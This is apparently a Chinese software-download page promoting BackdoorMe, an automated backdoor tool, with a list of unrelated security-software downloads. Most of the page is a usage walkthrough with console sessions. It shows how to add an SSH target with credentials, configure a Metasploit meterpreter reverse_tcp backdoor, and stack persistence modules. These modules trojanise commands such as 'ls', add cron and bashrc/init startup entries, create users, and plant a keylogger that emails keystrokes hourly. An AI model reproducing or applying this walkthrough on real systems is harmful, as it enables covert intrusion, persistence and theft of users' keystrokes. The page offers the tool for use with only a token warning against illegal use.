BackdoorMe是一款功能強大的自動化后門工具,用于滲透測試!很明顯,軟件是帶有攻擊性的,嚴禁用于非法用途。該工具目前使用了metasploit接口,以后會慢慢淡化接口,增強自身特色。需要的朋友下!
什么是后門程序
后門程序一般是指那些繞過安全性控制而獲取對程序或系統訪問權的程序方法。在軟件的開發(fā)階段,程序員常常會在軟件內創(chuàng)建后門程序以便可以修改程序設計中的缺陷。但是,如果這些后門被其他人知道,或是在發(fā)布軟件之前沒有刪除后門程序,那么它就成了安全風險,容易被黑客當成漏洞進行攻擊。
后門程序又稱特洛依木馬,其用途在于潛伏在電腦中,從事搜集信息或便于黑客進入的動作。后門程序和電腦病毒最大的差別,在于后門程序不一定有自我復制的動作,也就是后門程序不一定會“感染”其它電腦。
BackdoorMe有哪些功能模塊

其內置了Backdoors(后門)、Modules(模塊)和Auxiliaries(輔助模塊)
Bash
Bash2 (依賴更多)
Metasploit
Netcat
Netcat-traditional
Perl
Php (非WEB后門,但使用了WEB模塊)
Pupy
Python
Web (php –WEB后門)
BackdoorMe怎么用
在安裝backdoorme之前,請先確保您準備好了所有的依賴包。
$ python dependencies.py
啟動backdoorme:
$ python master.py ___ __ __ __ ___ / _ )___ _____/ /_____/ /__ ___ ____/ |/ /__ / _ / _ `/ __/ '_/ _ / _ \/ _ \/ __/ /|_/ / -_) /____/\_,_/\__/_/\_\\_,_/\___/\___/_/ /_/ /_/\__/ Welcome to BackdoorMe, a powerful backdooring utility. Type "help" to see the list of available commands. Type "addtarget" to set a target, and "open" to open an SSH connection to that target. Using local IP of 10.1.0.1. >>
加入target:
>> addtarget Target Hostname: 10.1.0.2 Username: victim Password: password123 + Target 1 Set! >>
Backdoor
請輸入“use”關鍵詞來使用后門:
>> use metasploit + Using current target 1. + Using Metasploit backdoor... (msf) >>
從從這兒開始,你可以設置后門相關選項,運行“show options”或者“help”,來查看需要配置的參數。這里設置選項,用“set”就行了。
(msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name initd name of the backdoor False format elf format to write the backdoor to True lhost 10.1.0.1 local IP to connect back to True encoder none encoder to use for the backdoor False lport 4444 local port to connect back on True payload linux/x86/meterpreter/reverse_tcp payload to deploy in backdoor True (msf) >> set name apache + name => apache (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name apache name of the backdoor False ...
Modules
每個后門在添加了額外的模塊后,會變得更加有效。要添加一個模塊,只需要使用“add”。
(msf) >> add poison + Poison module added
每個模塊都有額外的參數可以定制,如果運行了“help”,你可以看到或者設置任何附加選項。
(msf) >> help ... Poison module options: Option Value Description Required ------ ----- ----------- -------- name ls name of command to poison False location /bin where to put poisoned files into False
現在能啟用的模塊包括:
Poison:
感染目標計算機上的可執(zhí)行文件,它會編譯一個exe,把原有的程序變?yōu)楹箝T。
比如,如果這個模塊感染了“l(fā)s”,它會進行編譯,然后把正常“l(fā)s”給變成后門“l(fā)s”,這樣一來用戶可以更頻繁地運行“l(fā)s”后門。
Cron:
作用和做法同上。
Web:
啟動WEB服務,放置存有后門的WEB頁面,訪問該網頁則監(jiān)聽開始。
Keylogger:
植入鍵盤記錄器,在配置時可以配入點自己郵件,每小時會收到結果。
User:
添加新用戶。
Startup:
可以將后門植入bashrc或者init文件。
Auxiliaries
為了更加隱蔽,某些用戶可能會希望在目標機 器上使用特定的服務。應用auxiliary模塊,使用“apply”即可。
>> apply user + User Auxiliary Module added.
Auxiliaries支持modules的使用,所有它們能更加隱蔽和頻繁的運行。
>> (user) add startup + Startup Module added.
現有啟用的auxiliaries包括:
User
在目標機器添加新用戶。
Targets
Backdoorme支持同時操作多個目標,使用數字序號切換即可。比如,使用“use metasploit 2”命令,可以在目標“2”上使用msf。
- PC官方版
- 安卓官方手機版
- IOS官方手機版













VMware vSAN Data Protection 9.0.0.09.0.3.0.24693627 中文版
SoftCnKiller流氓軟件檢測工具2.70 免費版
Store-ind聯想軟件管家7.1.30.0428獨立提取版
工行企業(yè)網銀控件程序32&64位
工行網銀助手32位2.0 官方正版
工行網銀助手64位2.0 官方正版
360網絡小工具四合一整合端永久免費版
SpyShelter Personal Free9.0 中文版
吾愛免殺工具箱綠色版1.0免費版
異常進程請求攔截工具(OSArmor)1.4 官方版
騰訊哈勃攝像頭安全檢測工具1.0.0.1 最新版
英特爾至尊調優(yōu)實用程序(英特爾 XTU)6.4.1.23 最新版
文件衛(wèi)士(電腦文件加密)19.18.00 永久免費版
Abelssoft HackCheck官方版v2018 最新版
InSpectre(CPU漏洞檢測工具)1.0 綠色版
微軟CPU熔斷和幽靈漏洞補丁官方版
關閉特定程序軟件(CloseToQuit)1.0 綠色免費版
IObit Malware Fighter Pro惡意軟件清除5.3.0.4078 中文特別版
desktoplayer專殺工具免費版
IBM Rational AppScan電腦版8.0.491.0免費版
強行修改啟動密碼PC版1.0.0電腦版
360文檔衛(wèi)士1.0.0.1023官方最新版
隱身俠(將重要文件夾/文件進行隱藏)6.0.0.2 官方版
路由優(yōu)化大師(拒絕別人蹭網)4.5.32.275 官網正式版
共享文件夾加密超級大師PC版1.28 官網最新版
凈網衛(wèi)士電腦版2.1.4.0 PC版
360加固寶pc端(360加固助手)3.2.2.1 官方版 【64/32位】
秘銀保險箱pc版1.5 官方最新版
主頁保安(主頁防篡改工具)1.0 綠色版
北極熊掃描器(網站安全檢測軟件)4.4 官網免費版





des算法測式工具(DES加密解密算法測試小軟件
眼鏡蛇掃描器(眼鏡蛇網絡安全掃描器)2.3 中
U盤掛機鎖(讓電腦運行必須插入U盤)1.0 中文
0611163文件加密2.2 免費版
星礴專用加密軟件2.0.1 中文綠色版
盛付通安全控件1.0 免費最新版 【2015】
PIDKey(檢測Win&Office&VS的密鑰有效性)2.0
360向上衛(wèi)士官方版下載2.0 最新版(針對兒童
瑞星卡卡上網安全助手V6.2.0.450 官方安裝版
掛機鎖小鑰匙(具備強大鎖屏功能)8.1 簡體